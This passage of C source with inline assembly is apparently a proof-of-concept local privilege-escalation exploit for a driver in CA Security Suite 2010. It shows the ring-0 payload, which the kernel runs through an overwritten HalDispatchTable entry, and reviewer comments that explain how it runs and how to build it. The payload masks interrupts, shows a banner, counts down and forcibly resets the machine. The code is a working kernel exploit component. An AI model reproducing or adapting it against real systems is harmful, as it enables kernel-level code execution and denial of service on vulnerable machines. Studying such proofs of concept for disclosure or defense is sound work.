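    return STATUS_SUCCESS;
}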

/*
 * Ring-0 payload.  main() copies 0x1000 raw bytes starting at this symbol
 * into an RWX user page, and the kernel later jumps there through the
 * overwritten HalDispatchTable[1] (NtQueryIntervalProfile).  It never
 * returns: it paints a banner on the boot-video (Inbv) console, counts
 * down and resets the machine via the keyboard controller -- which is why
 * the PoC gets away without any pool repair or clean return path.
 *
 * NOTE(review): the body is not position-independent.  The array
 * initialisers and the `call Inbv*` sites presumably reference this
 * process's own .rdata/.data (compiler-generated copies and indirect calls
 * through the globals above); that only works because the payload runs in
 * the context of the triggering process on pre-SMEP/SMAP 32-bit XP.  With
 * MSVC incremental linking the function symbol can resolve to a jmp thunk
 * rather than the body, so build without /INCREMENTAL -- confirm on the
 * toolchain used.
 */
VOID InbvShellCode()
{
    UCHAR BugCheck01[] = " 3";
    UCHAR BugCheck02[] = " 2";
    UCHAR BugCheck03[] = " 1";
    UCHAR BugCheck04[] = " Rebooting ...";
    UCHAR BugCheckString[] =
 " MONTH OF ANTIVIRUS BUGS                                                        "
    " Affected Software: CA Security Suite 2010                                      "
    " Affected Driver: KmxSbx.sys                                                    "
    " Local Privilege Escalation Proof of Concept                                    "
    " For Educational Purposes Only !                                                "
    " Discovered by CISS Research Team                                               "
    "                                                                                ";

    __asm
    {
        //
        // KeDisableInterrupts
        //
        pushf                       // eax = EFLAGS.IF (bit 9); the value is
        pop eax                     // never used afterwards -- presumably a
        and eax, 0x0200             // leftover of an inlined
        shr eax, 0x09               // KeDisableInterrupts
        cli                         // interrupts stay masked until the reset

        //
        // Prepareing Screen
        //
        call InbvAcquireDisplayOwnership   // indirect calls through the globals resolved by XxInitInbv

        call InbvResetDisplay

        sub esi, esi                // esi = 0
        push 0x04                   // Color
        mov edi, 0x01DF
        push edi                    // Height = 0x1DF
        mov ebx, 0x027F
        push ebx                    // Width  = 0x27F
        push esi                    // Top    = 0
        push esi                    // Left   = 0
        call InbvSolidColorFill     // stdcall: arguments pushed right to left

        push 0x0F
        call InbvSetTextColor       // Color = 0x0F

        push esi
        call InbvInstallDisplayStringFilter   // Filter = NULL

        inc esi
        push esi
        call InbvEnableDisplayString          // Enable = 1

        dec edi
        dec edi                     // edi = 0x1DD
        push edi                    // Height
        push ebx                    // Width = 0x27F
        dec esi                     // esi back to 0
        push esi                    // Top
        push esi                    // Left
        call InbvSetScrollRegion

        lea eax, BugCheckString     // address of the banner's stack copy
        push eax
        call InbvDisplayString

        mov esi, 0x80000000         // spin count reused by every countdown step
        mov ecx, esi

        //
        // Countdown
        //
    __loop01:                       // busy-wait 2^31 iterations; interrupts are
        dec ecx                     // off, so nothing else runs on this CPU
        jnz __loop01

        lea eax, BugCheck01
        push eax
        call InbvDisplayString

        mov ecx, esi

    __loop02:
        dec ecx
        jnz __loop02

        lea eax, BugCheck02
        push eax
        call InbvDisplayString

        mov ecx, esi

    __loop03:
        dec ecx
        jnz __loop03

        lea eax, BugCheck03
        push eax
        call InbvDisplayString

        mov ecx, esi

    __loop04:
        dec ecx
        jnz __loop04

        lea eax, BugCheck04
        push eax
        call InbvDisplayString

        mov ecx, esi
        shl ecx, 0x01               // 0x80000000 << 1 wraps to 0, so the final
                                    // wait actually runs the full 2^32 iterations
    __loop05:
        dec ecx
        jnz __loop05

        //
        // Reseting Processor
        //
        mov al, 0xFE
        out 0x64, al                // 8042 keyboard-controller command 0xFE: pulse the CPU reset line
    }
}


 